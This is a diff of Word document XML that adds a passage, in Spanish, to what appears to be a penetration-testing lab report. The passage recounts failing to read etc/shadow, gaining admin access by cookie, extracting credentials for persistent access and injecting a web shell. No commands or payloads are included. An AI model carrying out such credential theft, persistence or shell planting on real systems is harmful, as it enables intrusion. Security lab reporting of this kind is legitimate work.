+        <w:t xml:space="preserve"> se consigue la lista de usuarios permitidos, no pudiendo acceder a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>etc/shadow, no pudiendo hacer nada con este archivo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64B32D89" wp14:editId="48E6BEBB">
+            <wp:extent cx="5039428" cy="4344006"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="2014446987" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2014446987" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5039428" cy="4344006"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Por todo lo anterior, y con todos los esfuerzos invertidos, solo he conseguido acceder como administrador al servidor por cookie y posteriormente he sacado el usuario y contraseña, para tener acceso persistente, no logrando ejecutar el RCE aunque si haya inyectado en el servidor una Shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4665,6 +6555,74 @@
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="001A7B60"/>
   </w:style>
+  <w:style w:type="character" w:styleId="Refdecomentario">
+    <w:name w:val="annotation reference"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF361A"/>
+    <w:rPr>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Textocomentario">
+    <w:name w:val="annotation text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="TextocomentarioCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF361A"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TextocomentarioCar">
+    <w:name w:val="Texto comentario Car"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:link w:val="Textocomentario"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00AF361A"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Asuntodelcomentario">
+    <w:name w:val="annotation subject"/>
+    <w:basedOn w:val="Textocomentario"/>
+    <w:next w:val="Textocomentario"/>
+    <w:link w:val="AsuntodelcomentarioCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF361A"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="AsuntodelcomentarioCar">
+    <w:name w:val="Asunto del comentario Car"/>
+    <w:basedOn w:val="TextocomentarioCar"/>
+    <w:link w:val="Asuntodelcomentario"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00AF361A"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
